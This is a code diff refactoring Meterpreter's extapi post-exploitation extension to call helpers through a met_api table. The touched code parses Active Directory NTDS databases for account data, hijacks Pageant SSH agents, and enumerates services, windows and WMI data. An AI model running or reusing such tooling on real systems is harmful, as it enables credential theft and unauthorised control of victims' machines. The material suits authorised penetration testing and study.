#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
||||||
|
|
||||||
#include "window.h"
|
#include "window.h"
|
||||||
@ -18,9 +19,6 @@
|
|||||||
#include "ntds.h"
|
#include "ntds.h"
|
||||||
#include "pageantjacker.h"
|
#include "pageantjacker.h"
|
||||||
|
|
||||||
// this sets the delay load hook function, see DelayLoadMetSrv.h
|
|
||||||
EnableDelayLoadMetSrv();
|
|
||||||
|
|
||||||
/*! @brief List of commands that the extended API extension providers. */
|
/*! @brief List of commands that the extended API extension providers. */
|
||||||
Command customCommands[] =
|
Command customCommands[] =
|
||||||
{
|
{
|
||||||
@ -45,14 +43,15 @@ Command customCommands[] =
|
|||||||
|
|
||||||
/*!
|
/*!
|
||||||
* @brief Initialize the server extension.
|
* @brief Initialize the server extension.
|
||||||
|
* @param api Pointer to the Meterpreter API structure.
|
||||||
* @param remote Pointer to the remote instance.
|
* @param remote Pointer to the remote instance.
|
||||||
* @return Indication of success or failure.
|
* @return Indication of success or failure.
|
||||||
*/
|
*/
|
||||||
DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
|
DWORD __declspec(dllexport) InitServerExtension(MetApi* api, Remote* remote)
|
||||||
{
|
{
|
||||||
hMetSrv = remote->met_srv;
|
met_api = api;
|
||||||
|
|
||||||
command_register_all(customCommands);
|
met_api->command.register_all(customCommands);
|
||||||
|
|
||||||
initialise_clipboard();
|
initialise_clipboard();
|
||||||
initialise_service();
|
initialise_service();
|
||||||
@ -67,7 +66,7 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
|
|||||||
*/
|
*/
|
||||||
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
|
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
|
||||||
{
|
{
|
||||||
command_deregister_all(customCommands);
|
met_api->command.deregister_all(customCommands);
|
||||||
|
|
||||||
return ERROR_SUCCESS;
|
return ERROR_SUCCESS;
|
||||||
}
|
}
|
||||||
|
|||||||
@ -3,6 +3,7 @@
|
|||||||
* @brief NTDS channel interface
|
* @brief NTDS channel interface
|
||||||
*/
|
*/
|
||||||
#include "extapi.h"
|
#include "extapi.h"
|
||||||
|
#include "common_metapi.h"
|
||||||
|
|
||||||
#define JET_VERSION 0x0501
|
#define JET_VERSION 0x0501
|
||||||
|
|
||||||
@ -28,10 +29,10 @@ typedef struct
|
|||||||
// The user interacts with the NTDS database through that channel from that point on.
|
// The user interacts with the NTDS database through that channel from that point on.
|
||||||
DWORD ntds_parse(Remote *remote, Packet *packet)
|
DWORD ntds_parse(Remote *remote, Packet *packet)
|
||||||
{
|
{
|
||||||
Packet *response = packet_create_response(packet);
|
Packet *response = met_api->packet.create_response(packet);
|
||||||
DWORD res = ERROR_SUCCESS;
|
DWORD res = ERROR_SUCCESS;
|
||||||
struct jetState *ntdsState = calloc(1,sizeof(struct jetState));
|
struct jetState *ntdsState = calloc(1,sizeof(struct jetState));
|
||||||
PCHAR filePath = packet_get_tlv_value_string(packet, TLV_TYPE_NTDS_PATH);
|
PCHAR filePath = met_api->packet.get_tlv_value_string(packet, TLV_TYPE_NTDS_PATH);
|
||||||
// Check if the File exists
|
// Check if the File exists
|
||||||
if (0xffffffff == GetFileAttributes(filePath)) {
|
if (0xffffffff == GetFileAttributes(filePath)) {
|
||||||
res = 2;
|
res = 2;
|
||||||
@ -149,7 +150,7 @@ DWORD ntds_parse(Remote *remote, Packet *packet)
|
|||||||
chops.native.context = ctx;
|
chops.native.context = ctx;
|
||||||
chops.native.close = ntds_channel_close;
|
chops.native.close = ntds_channel_close;
|
||||||
chops.read = ntds_channel_read;
|
chops.read = ntds_channel_read;
|
||||||
if (!(newChannel = channel_create_pool(0, CHANNEL_FLAG_SYNCHRONOUS | CHANNEL_FLAG_COMPRESS, &chops)))
|
if (!(newChannel = met_api->channel.create_pool(0, CHANNEL_FLAG_SYNCHRONOUS | CHANNEL_FLAG_COMPRESS, &chops)))
|
||||||
{
|
{
|
||||||
res = ERROR_NOT_ENOUGH_MEMORY;
|
res = ERROR_NOT_ENOUGH_MEMORY;
|
||||||
free(accountColumns);
|
free(accountColumns);
|
||||||
@ -159,11 +160,11 @@ DWORD ntds_parse(Remote *remote, Packet *packet)
|
|||||||
goto out;
|
goto out;
|
||||||
}
|
}
|
||||||
|
|
||||||
channel_set_type(newChannel, "ntds");
|
met_api->channel.set_type(newChannel, "ntds");
|
||||||
packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channel_get_id(newChannel));
|
met_api->packet.add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, met_api->channel.get_id(newChannel));
|
||||||
|
|
||||||
out:
|
out:
|
||||||
packet_transmit_response(res, remote, response);
|
met_api->packet.transmit_response(res, remote, response);
|
||||||
return ERROR_SUCCESS;
|
return ERROR_SUCCESS;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@ -3,6 +3,7 @@
|
|||||||
* @brief Definitions for NTDS Jet Engine functions
|
* @brief Definitions for NTDS Jet Engine functions
|
||||||
*/
|
*/
|
||||||
#include "extapi.h"
|
#include "extapi.h"
|
||||||
|
#include "common_metapi.h"
|
||||||
|
|
||||||
#define JET_VERSION 0x0501
|
#define JET_VERSION 0x0501
|
||||||
|
|
||||||
@ -246,7 +247,7 @@ JET_ERR read_user(struct jetState *ntdsState, struct ntdsColumns *accountColumns
|
|||||||
return readStatus;
|
return readStatus;
|
||||||
}
|
}
|
||||||
|
|
||||||
char *accountNameStr = wchar_to_utf8(accountName);
|
char *accountNameStr = met_api->string.wchar_to_utf8(accountName);
|
||||||
if (accountNameStr) {
|
if (accountNameStr) {
|
||||||
strncpy_s(userAccount->accountName, ACCOUNT_NAME_SIZE, accountNameStr, ACCOUNT_NAME_SIZE - 1);
|
strncpy_s(userAccount->accountName, ACCOUNT_NAME_SIZE, accountNameStr, ACCOUNT_NAME_SIZE - 1);
|
||||||
free(accountNameStr);
|
free(accountNameStr);
|
||||||
@ -262,7 +263,7 @@ JET_ERR read_user(struct jetState *ntdsState, struct ntdsColumns *accountColumns
|
|||||||
return readStatus;
|
return readStatus;
|
||||||
}
|
}
|
||||||
|
|
||||||
char *accountDescriptionStr = wchar_to_utf8(accountDescription);
|
char *accountDescriptionStr = met_api->string.wchar_to_utf8(accountDescription);
|
||||||
if (accountDescriptionStr) {
|
if (accountDescriptionStr) {
|
||||||
strncpy_s(userAccount->accountDescription, ACCOUNT_DESC_SIZE, accountDescriptionStr, ACCOUNT_DESC_SIZE - 1);
|
strncpy_s(userAccount->accountDescription, ACCOUNT_DESC_SIZE, accountDescriptionStr, ACCOUNT_DESC_SIZE - 1);
|
||||||
free(accountDescriptionStr);
|
free(accountDescriptionStr);
|
||||||
|
|||||||
@ -3,6 +3,7 @@
|
|||||||
* @brief Entry point and intialisation functionality for the pageantjacker extention.
|
* @brief Entry point and intialisation functionality for the pageantjacker extention.
|
||||||
*/
|
*/
|
||||||
#include "extapi.h"
|
#include "extapi.h"
|
||||||
|
#include "common_metapi.h"
|
||||||
#include "pageantjacker.h"
|
#include "pageantjacker.h"
|
||||||
|
|
||||||
#include <stdio.h>
|
#include <stdio.h>
|
||||||
@ -173,14 +174,14 @@ out:
|
|||||||
|
|
||||||
DWORD request_pageant_send_query(Remote *remote, Packet *packet)
|
DWORD request_pageant_send_query(Remote *remote, Packet *packet)
|
||||||
{
|
{
|
||||||
Packet *response = packet_create_response(packet);
|
Packet *response = met_api->packet.create_response(packet);
|
||||||
DWORD rawDataSizeIn = 0;
|
DWORD rawDataSizeIn = 0;
|
||||||
Byte *rawDataIn = NULL;
|
byte *rawDataIn = NULL;
|
||||||
PAGEANTQUERYRESULTS results = { 0 };
|
PAGEANTQUERYRESULTS results = { 0 };
|
||||||
|
|
||||||
// Retrieve from metasploit
|
// Retrieve from metasploit
|
||||||
rawDataSizeIn = packet_get_tlv_value_uint(packet, TLV_TYPE_EXT_PAGEANT_SIZE_IN);
|
rawDataSizeIn = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_EXT_PAGEANT_SIZE_IN);
|
||||||
rawDataIn = packet_get_tlv_value_raw(packet, TLV_TYPE_EXT_PAGEANT_BLOB_IN);
|
rawDataIn = met_api->packet.get_tlv_value_raw(packet, TLV_TYPE_EXT_PAGEANT_BLOB_IN);
|
||||||
|
|
||||||
dprintf("[PJ(request_pageant_send_query)] Size in: %d. Data is at 0x%p", rawDataSizeIn, rawDataIn);
|
dprintf("[PJ(request_pageant_send_query)] Size in: %d. Data is at 0x%p", rawDataSizeIn, rawDataIn);
|
||||||
|
|
||||||
@ -194,9 +195,9 @@ DWORD request_pageant_send_query(Remote *remote, Packet *packet)
|
|||||||
send_query_to_pageant(rawDataIn, rawDataSizeIn, (PAGEANTQUERYRESULTS *) &results);
|
send_query_to_pageant(rawDataIn, rawDataSizeIn, (PAGEANTQUERYRESULTS *) &results);
|
||||||
|
|
||||||
// Build the packet based on the respones from the Pageant interaction.
|
// Build the packet based on the respones from the Pageant interaction.
|
||||||
packet_add_tlv_bool(response, TLV_TYPE_EXT_PAGEANT_STATUS, results.result);
|
met_api->packet.add_tlv_bool(response, TLV_TYPE_EXT_PAGEANT_STATUS, results.result);
|
||||||
packet_add_tlv_raw(response, TLV_TYPE_EXT_PAGEANT_RETURNEDBLOB, results.blob, results.bloblength);
|
met_api->packet.add_tlv_raw(response, TLV_TYPE_EXT_PAGEANT_RETURNEDBLOB, results.blob, results.bloblength);
|
||||||
packet_add_tlv_uint(response, TLV_TYPE_EXT_PAGEANT_ERRORMESSAGE, results.errorMessage);
|
met_api->packet.add_tlv_uint(response, TLV_TYPE_EXT_PAGEANT_ERRORMESSAGE, results.errorMessage);
|
||||||
dprintf("[PJ(request_pageant_send_query)] Success: %d. Return data len "
|
dprintf("[PJ(request_pageant_send_query)] Success: %d. Return data len "
|
||||||
"%d, data is at 0x%p. Error message at 0x%p (%d)",
|
"%d, data is at 0x%p. Error message at 0x%p (%d)",
|
||||||
results.result, results.bloblength, results.blob,
|
results.result, results.bloblength, results.blob,
|
||||||
@ -205,7 +206,7 @@ DWORD request_pageant_send_query(Remote *remote, Packet *packet)
|
|||||||
free(results.blob);
|
free(results.blob);
|
||||||
|
|
||||||
// Transmit the packet to metasploit
|
// Transmit the packet to metasploit
|
||||||
packet_transmit_response(ERROR_SUCCESS, remote, response);
|
met_api->packet.transmit_response(ERROR_SUCCESS, remote, response);
|
||||||
|
|
||||||
return ERROR_SUCCESS;
|
return ERROR_SUCCESS;
|
||||||
}
|
}
|
||||||
|
|||||||
@ -4,6 +4,7 @@
|
|||||||
*/
|
*/
|
||||||
#include "extapi.h"
|
#include "extapi.h"
|
||||||
#include "service.h"
|
#include "service.h"
|
||||||
|
#include "common_metapi.h"
|
||||||
|
|
||||||
#include <Sddl.h>
|
#include <Sddl.h>
|
||||||
|
|
||||||
@ -189,7 +190,7 @@ DWORD request_service_control(Remote *remote, Packet *packet)
|
|||||||
LPSTR lpServiceName = NULL;
|
LPSTR lpServiceName = NULL;
|
||||||
ServiceOperation eServiceOp = 0;
|
ServiceOperation eServiceOp = 0;
|
||||||
DWORD dwResult = ERROR_SUCCESS;
|
DWORD dwResult = ERROR_SUCCESS;
|
||||||
Packet * response = packet_create_response(packet);
|
Packet * response = met_api->packet.create_response(packet);
|
||||||
|
|
||||||
do
|
do
|
||||||
{
|
{
|
||||||
@ -200,13 +201,13 @@ DWORD request_service_control(Remote *remote, Packet *packet)
|
|||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
lpServiceName = packet_get_tlv_value_string(packet, TLV_TYPE_EXT_SERVICE_CTRL_NAME);
|
lpServiceName = met_api->packet.get_tlv_value_string(packet, TLV_TYPE_EXT_SERVICE_CTRL_NAME);
|
||||||
if (!lpServiceName)
|
if (!lpServiceName)
|
||||||
{
|
{
|
||||||
BREAK_WITH_ERROR("[EXTAPI SERVICE] Missing service name parameter", ERROR_INVALID_PARAMETER);
|
BREAK_WITH_ERROR("[EXTAPI SERVICE] Missing service name parameter", ERROR_INVALID_PARAMETER);
|
||||||
}
|
}
|
||||||
|
|
||||||
eServiceOp = (ServiceOperation)packet_get_tlv_value_uint(packet, TLV_TYPE_EXT_SERVICE_CTRL_OP);
|
eServiceOp = (ServiceOperation)met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_EXT_SERVICE_CTRL_OP);
|
||||||
if (eServiceOp == 0)
|
if (eServiceOp == 0)
|
||||||
{
|
{
|
||||||
BREAK_WITH_ERROR("[EXTAPI SERVICE] Missing service operation parameter", ERROR_INVALID_PARAMETER);
|
BREAK_WITH_ERROR("[EXTAPI SERVICE] Missing service operation parameter", ERROR_INVALID_PARAMETER);
|
||||||
@ -220,7 +221,7 @@ DWORD request_service_control(Remote *remote, Packet *packet)
|
|||||||
dprintf("[EXTAPI SERVICE] Transmitting response back to caller.");
|
dprintf("[EXTAPI SERVICE] Transmitting response back to caller.");
|
||||||
if (response)
|
if (response)
|
||||||
{
|
{
|
||||||
packet_transmit_response(dwResult, remote, response);
|
met_api->packet.transmit_response(dwResult, remote, response);
|
||||||
}
|
}
|
||||||
|
|
||||||
return dwResult;
|
return dwResult;
|
||||||
@ -235,7 +236,7 @@ DWORD request_service_control(Remote *remote, Packet *packet)
|
|||||||
DWORD request_service_enum(Remote *remote, Packet *packet)
|
DWORD request_service_enum(Remote *remote, Packet *packet)
|
||||||
{
|
{
|
||||||
DWORD dwResult = ERROR_SUCCESS;
|
DWORD dwResult = ERROR_SUCCESS;
|
||||||
Packet * response = packet_create_response(packet);
|
Packet * response = met_api->packet.create_response(packet);
|
||||||
|
|
||||||
do
|
do
|
||||||
{
|
{
|
||||||
@ -254,7 +255,7 @@ DWORD request_service_enum(Remote *remote, Packet *packet)
|
|||||||
dprintf("[EXTAPI SERVICE] Transmitting response back to caller.");
|
dprintf("[EXTAPI SERVICE] Transmitting response back to caller.");
|
||||||
if (response)
|
if (response)
|
||||||
{
|
{
|
||||||
packet_transmit_response(dwResult, remote, response);
|
met_api->packet.transmit_response(dwResult, remote, response);
|
||||||
}
|
}
|
||||||
|
|
||||||
return dwResult;
|
return dwResult;
|
||||||
@ -274,7 +275,7 @@ DWORD request_service_query(Remote *remote, Packet *packet)
|
|||||||
{
|
{
|
||||||
LPSTR lpServiceName = NULL;
|
LPSTR lpServiceName = NULL;
|
||||||
DWORD dwResult = ERROR_SUCCESS;
|
DWORD dwResult = ERROR_SUCCESS;
|
||||||
Packet * response = packet_create_response(packet);
|
Packet * response = met_api->packet.create_response(packet);
|
||||||
|
|
||||||
do
|
do
|
||||||
{
|
{
|
||||||
@ -285,7 +286,7 @@ DWORD request_service_query(Remote *remote, Packet *packet)
|
|||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
lpServiceName = packet_get_tlv_value_string(packet, TLV_TYPE_EXT_SERVICE_ENUM_NAME);
|
lpServiceName = met_api->packet.get_tlv_value_string(packet, TLV_TYPE_EXT_SERVICE_ENUM_NAME);
|
||||||
if (!lpServiceName)
|
if (!lpServiceName)
|
||||||
{
|
{
|
||||||
BREAK_WITH_ERROR("[EXTAPI SERVICE] Missing service name parameter", ERROR_INVALID_PARAMETER);
|
BREAK_WITH_ERROR("[EXTAPI SERVICE] Missing service name parameter", ERROR_INVALID_PARAMETER);
|
||||||
@ -299,7 +300,7 @@ DWORD request_service_query(Remote *remote, Packet *packet)
|
|||||||
dprintf("[EXTAPI SERVICE] Transmitting response back to caller.");
|
dprintf("[EXTAPI SERVICE] Transmitting response back to caller.");
|
||||||
if (response)
|
if (response)
|
||||||
{
|
{
|
||||||
packet_transmit_response(dwResult, remote, response);
|
met_api->packet.transmit_response(dwResult, remote, response);
|
||||||
}
|
}
|
||||||
|
|
||||||
return dwResult;
|
return dwResult;
|
||||||
@ -605,15 +606,15 @@ DWORD execute_service_task(LPCSTR cpServiceName, ServiceOperation eServiceOp, Pa
|
|||||||
*/
|
*/
|
||||||
VOID add_enumerated_service(Packet *pResponse, LPCSTR cpName, LPCSTR cpDisplayName, DWORD dwProcessId, DWORD dwStatus, BOOL bInteractive)
|
VOID add_enumerated_service(Packet *pResponse, LPCSTR cpName, LPCSTR cpDisplayName, DWORD dwProcessId, DWORD dwStatus, BOOL bInteractive)
|
||||||
{
|
{
|
||||||
Packet* pGroup = packet_create_group();
|
Packet* pGroup = met_api->packet.create_group();
|
||||||
|
|
||||||
packet_add_tlv_string(pGroup, TLV_TYPE_EXT_SERVICE_ENUM_NAME, cpName);
|
met_api->packet.add_tlv_string(pGroup, TLV_TYPE_EXT_SERVICE_ENUM_NAME, cpName);
|
||||||
packet_add_tlv_string(pGroup, TLV_TYPE_EXT_SERVICE_ENUM_DISPLAYNAME, cpDisplayName);
|
met_api->packet.add_tlv_string(pGroup, TLV_TYPE_EXT_SERVICE_ENUM_DISPLAYNAME, cpDisplayName);
|
||||||
packet_add_tlv_uint(pGroup, TLV_TYPE_EXT_SERVICE_ENUM_PID, dwProcessId);
|
met_api->packet.add_tlv_uint(pGroup, TLV_TYPE_EXT_SERVICE_ENUM_PID, dwProcessId);
|
||||||
packet_add_tlv_uint(pGroup, TLV_TYPE_EXT_SERVICE_ENUM_STATUS, dwStatus);
|
met_api->packet.add_tlv_uint(pGroup, TLV_TYPE_EXT_SERVICE_ENUM_STATUS, dwStatus);
|
||||||
packet_add_tlv_bool(pGroup, TLV_TYPE_EXT_SERVICE_ENUM_INTERACTIVE, bInteractive);
|
met_api->packet.add_tlv_bool(pGroup, TLV_TYPE_EXT_SERVICE_ENUM_INTERACTIVE, bInteractive);
|
||||||
|
|
||||||
packet_add_group(pResponse, TLV_TYPE_EXT_SERVICE_ENUM_GROUP, pGroup);
|
met_api->packet.add_group(pResponse, TLV_TYPE_EXT_SERVICE_ENUM_GROUP, pGroup);
|
||||||
}
|
}
|
||||||
|
|
||||||
/*!
|
/*!
|
||||||
@ -658,12 +659,12 @@ DWORD get_service_config(SC_HANDLE scService, Packet *pResponse)
|
|||||||
}
|
}
|
||||||
|
|
||||||
dprintf("[EXTAPI SERVICE] Start type: %u", lpServiceConfig->dwStartType);
|
dprintf("[EXTAPI SERVICE] Start type: %u", lpServiceConfig->dwStartType);
|
||||||
packet_add_tlv_uint(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_STARTTYPE, lpServiceConfig->dwStartType);
|
met_api->packet.add_tlv_uint(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_STARTTYPE, lpServiceConfig->dwStartType);
|
||||||
packet_add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_DISPLAYNAME, lpServiceConfig->lpDisplayName);
|
met_api->packet.add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_DISPLAYNAME, lpServiceConfig->lpDisplayName);
|
||||||
packet_add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_STARTNAME, lpServiceConfig->lpServiceStartName);
|
met_api->packet.add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_STARTNAME, lpServiceConfig->lpServiceStartName);
|
||||||
packet_add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_PATH, lpServiceConfig->lpBinaryPathName);
|
met_api->packet.add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_PATH, lpServiceConfig->lpBinaryPathName);
|
||||||
packet_add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP, lpServiceConfig->lpLoadOrderGroup ? lpServiceConfig->lpLoadOrderGroup : "");
|
met_api->packet.add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP, lpServiceConfig->lpLoadOrderGroup ? lpServiceConfig->lpLoadOrderGroup : "");
|
||||||
packet_add_tlv_bool(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE, lpServiceConfig->dwServiceType & SERVICE_INTERACTIVE_PROCESS);
|
met_api->packet.add_tlv_bool(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE, lpServiceConfig->dwServiceType & SERVICE_INTERACTIVE_PROCESS);
|
||||||
|
|
||||||
} while (0);
|
} while (0);
|
||||||
|
|
||||||
@ -703,7 +704,7 @@ DWORD get_service_status(SC_HANDLE scService, Packet *pResponse)
|
|||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
packet_add_tlv_uint(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_STATUS, serviceStatus.dwCurrentState);
|
met_api->packet.add_tlv_uint(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_STATUS, serviceStatus.dwCurrentState);
|
||||||
|
|
||||||
} while (0);
|
} while (0);
|
||||||
|
|
||||||
@ -757,7 +758,7 @@ DWORD get_service_dacl(SC_HANDLE scService, Packet *pResponse)
|
|||||||
BREAK_ON_ERROR("[EXTAPI SERVICE] Unable to get DACL string");
|
BREAK_ON_ERROR("[EXTAPI SERVICE] Unable to get DACL string");
|
||||||
}
|
}
|
||||||
|
|
||||||
packet_add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_DACL, lpDaclString);
|
met_api->packet.add_tlv_string(pResponse, TLV_TYPE_EXT_SERVICE_QUERY_DACL, lpDaclString);
|
||||||
|
|
||||||
} while (0);
|
} while (0);
|
||||||
|
|
||||||
|
|||||||
@ -3,6 +3,7 @@
|
|||||||
* @brief Definitions for window management functionality
|
* @brief Definitions for window management functionality
|
||||||
*/
|
*/
|
||||||
#include "extapi.h"
|
#include "extapi.h"
|
||||||
|
#include "common_metapi.h"
|
||||||
#include "window.h"
|
#include "window.h"
|
||||||
|
|
||||||
VOID add_enumerated_window(Packet *pResponse, QWORD qwHandle, const wchar_t* cpWindowTitle_u, const wchar_t* cpClassName_u, DWORD dwProcessId);
|
VOID add_enumerated_window(Packet *pResponse, QWORD qwHandle, const wchar_t* cpWindowTitle_u, const wchar_t* cpClassName_u, DWORD dwProcessId);
|
||||||
@ -186,7 +187,7 @@ DWORD request_window_enum(Remote *remote, Packet *packet)
|
|||||||
QWORD parentWindow = 0;
|
QWORD parentWindow = 0;
|
||||||
DWORD dwResult = ERROR_SUCCESS;
|
DWORD dwResult = ERROR_SUCCESS;
|
||||||
BOOL bIncludeUnknown = FALSE;
|
BOOL bIncludeUnknown = FALSE;
|
||||||
Packet * response = packet_create_response(packet);
|
Packet * response = met_api->packet.create_response(packet);
|
||||||
|
|
||||||
do
|
do
|
||||||
{
|
{
|
||||||
@ -199,10 +200,10 @@ DWORD request_window_enum(Remote *remote, Packet *packet)
|
|||||||
|
|
||||||
// Extract the specified parent window. If this is NULL, that's ok, as we'll
|
// Extract the specified parent window. If this is NULL, that's ok, as we'll
|
||||||
// just enumerate top-level windows.
|
// just enumerate top-level windows.
|
||||||
parentWindow = packet_get_tlv_value_qword(packet, TLV_TYPE_EXT_WINDOW_ENUM_HANDLE);
|
parentWindow = met_api->packet.get_tlv_value_qword(packet, TLV_TYPE_EXT_WINDOW_ENUM_HANDLE);
|
||||||
|
|
||||||
// Extract the flag that indicates of unknown windows should be included in the output
|
// Extract the flag that indicates of unknown windows should be included in the output
|
||||||
bIncludeUnknown = packet_get_tlv_value_bool(packet, TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN);
|
bIncludeUnknown = met_api->packet.get_tlv_value_bool(packet, TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN);
|
||||||
|
|
||||||
dprintf("[EXTAPI WINDOW] Beginning window enumeration");
|
dprintf("[EXTAPI WINDOW] Beginning window enumeration");
|
||||||
dwResult = enumerate_windows(response, bIncludeUnknown, parentWindow);
|
dwResult = enumerate_windows(response, bIncludeUnknown, parentWindow);
|
||||||
@ -212,7 +213,7 @@ DWORD request_window_enum(Remote *remote, Packet *packet)
|
|||||||
dprintf("[EXTAPI WINDOW] Transmitting response back to caller.");
|
dprintf("[EXTAPI WINDOW] Transmitting response back to caller.");
|
||||||
if (response)
|
if (response)
|
||||||
{
|
{
|
||||||
packet_transmit_response(dwResult, remote, response);
|
met_api->packet.transmit_response(dwResult, remote, response);
|
||||||
}
|
}
|
||||||
|
|
||||||
return dwResult;
|
return dwResult;
|
||||||
@ -228,11 +229,11 @@ DWORD request_window_enum(Remote *remote, Packet *packet)
|
|||||||
*/
|
*/
|
||||||
VOID add_enumerated_window(Packet *pResponse, QWORD qwHandle, const wchar_t* cpWindowTitle, const wchar_t* cpClassName, DWORD dwProcessId)
|
VOID add_enumerated_window(Packet *pResponse, QWORD qwHandle, const wchar_t* cpWindowTitle, const wchar_t* cpClassName, DWORD dwProcessId)
|
||||||
{
|
{
|
||||||
Packet* pGroup = packet_create_group();
|
Packet* pGroup = met_api->packet.create_group();
|
||||||
|
|
||||||
packet_add_tlv_uint(pGroup, TLV_TYPE_EXT_WINDOW_ENUM_PID, dwProcessId);
|
met_api->packet.add_tlv_uint(pGroup, TLV_TYPE_EXT_WINDOW_ENUM_PID, dwProcessId);
|
||||||
packet_add_tlv_qword(pGroup, TLV_TYPE_EXT_WINDOW_ENUM_HANDLE, qwHandle);
|
met_api->packet.add_tlv_qword(pGroup, TLV_TYPE_EXT_WINDOW_ENUM_HANDLE, qwHandle);
|
||||||
packet_add_tlv_string(pGroup, TLV_TYPE_EXT_WINDOW_ENUM_TITLE, wchar_to_utf8(cpWindowTitle));
|
met_api->packet.add_tlv_string(pGroup, TLV_TYPE_EXT_WINDOW_ENUM_TITLE, met_api->string.wchar_to_utf8(cpWindowTitle));
|
||||||
packet_add_tlv_string(pGroup, TLV_TYPE_EXT_WINDOW_ENUM_CLASSNAME, wchar_to_utf8(cpClassName));
|
met_api->packet.add_tlv_string(pGroup, TLV_TYPE_EXT_WINDOW_ENUM_CLASSNAME, met_api->string.wchar_to_utf8(cpClassName));
|
||||||
packet_add_group(pResponse, TLV_TYPE_EXT_WINDOW_ENUM_GROUP, pGroup);
|
met_api->packet.add_group(pResponse, TLV_TYPE_EXT_WINDOW_ENUM_GROUP, pGroup);
|
||||||
}
|
}
|
||||||
|
|||||||
@ -3,6 +3,7 @@
|
|||||||
* @brief Definitions for WMI request handling functionality.
|
* @brief Definitions for WMI request handling functionality.
|
||||||
*/
|
*/
|
||||||
#include "extapi.h"
|
#include "extapi.h"
|
||||||
|
#include "common_metapi.h"
|
||||||
#include "wshelpers.h"
|
#include "wshelpers.h"
|
||||||
#include "wmi.h"
|
#include "wmi.h"
|
||||||
#include "wmi_interface.h"
|
#include "wmi_interface.h"
|
||||||
@ -20,7 +21,7 @@ DWORD request_wmi_query(Remote *remote, Packet *packet)
|
|||||||
LPSTR lpValue = NULL;
|
LPSTR lpValue = NULL;
|
||||||
LPWSTR lpwRoot = NULL;
|
LPWSTR lpwRoot = NULL;
|
||||||
LPWSTR lpwQuery = NULL;
|
LPWSTR lpwQuery = NULL;
|
||||||
Packet * response = packet_create_response(packet);
|
Packet * response = met_api->packet.create_response(packet);
|
||||||
|
|
||||||
do
|
do
|
||||||
{
|
{
|
||||||
@ -29,7 +30,7 @@ DWORD request_wmi_query(Remote *remote, Packet *packet)
|
|||||||
BREAK_WITH_ERROR("[EXTAPI WMI] Unable to create response packet", ERROR_OUTOFMEMORY);
|
BREAK_WITH_ERROR("[EXTAPI WMI] Unable to create response packet", ERROR_OUTOFMEMORY);
|
||||||
}
|
}
|
||||||
|
|
||||||
lpValue = packet_get_tlv_value_string(packet, TLV_TYPE_EXT_WMI_DOMAIN);
|
lpValue = met_api->packet.get_tlv_value_string(packet, TLV_TYPE_EXT_WMI_DOMAIN);
|
||||||
|
|
||||||
if (!lpValue)
|
if (!lpValue)
|
||||||
{
|
{
|
||||||
@ -44,7 +45,7 @@ DWORD request_wmi_query(Remote *remote, Packet *packet)
|
|||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
lpValue = packet_get_tlv_value_string(packet, TLV_TYPE_EXT_WMI_QUERY);
|
lpValue = met_api->packet.get_tlv_value_string(packet, TLV_TYPE_EXT_WMI_QUERY);
|
||||||
dprintf("[EXTAPI WMI] Query: %s", lpValue);
|
dprintf("[EXTAPI WMI] Query: %s", lpValue);
|
||||||
dwResult = to_wide_string(lpValue, &lpwQuery);
|
dwResult = to_wide_string(lpValue, &lpwQuery);
|
||||||
if (dwResult != ERROR_SUCCESS)
|
if (dwResult != ERROR_SUCCESS)
|
||||||
@ -71,7 +72,7 @@ DWORD request_wmi_query(Remote *remote, Packet *packet)
|
|||||||
dprintf("[EXTAPI WMI] Transmitting response back to caller.");
|
dprintf("[EXTAPI WMI] Transmitting response back to caller.");
|
||||||
if (response)
|
if (response)
|
||||||
{
|
{
|
||||||
packet_transmit_response(dwResult, remote, response);
|
met_api->packet.transmit_response(dwResult, remote, response);
|
||||||
}
|
}
|
||||||
|
|
||||||
return dwResult;
|
return dwResult;
|
||||||
|
|||||||
@ -5,6 +5,7 @@
|
|||||||
*/
|
*/
|
||||||
extern "C" {
|
extern "C" {
|
||||||
#include "extapi.h"
|
#include "extapi.h"
|
||||||
|
#include "common_metapi.h"
|
||||||
#include <inttypes.h>
|
#include <inttypes.h>
|
||||||
#include "wmi_interface.h"
|
#include "wmi_interface.h"
|
||||||
}
|
}
|
||||||
@ -327,7 +328,7 @@ DWORD wmi_query(LPCWSTR lpwRoot, LPWSTR lpwQuery, Packet* response)
|
|||||||
|
|
||||||
VARIANT** fields = (VARIANT**)malloc(sizeof(VARIANT*) * fieldCount);
|
VARIANT** fields = (VARIANT**)malloc(sizeof(VARIANT*) * fieldCount);
|
||||||
char value[FIELD_SIZE];
|
char value[FIELD_SIZE];
|
||||||
Packet* fieldGroup = packet_create_group();
|
Packet* fieldGroup = met_api->packet.create_group();
|
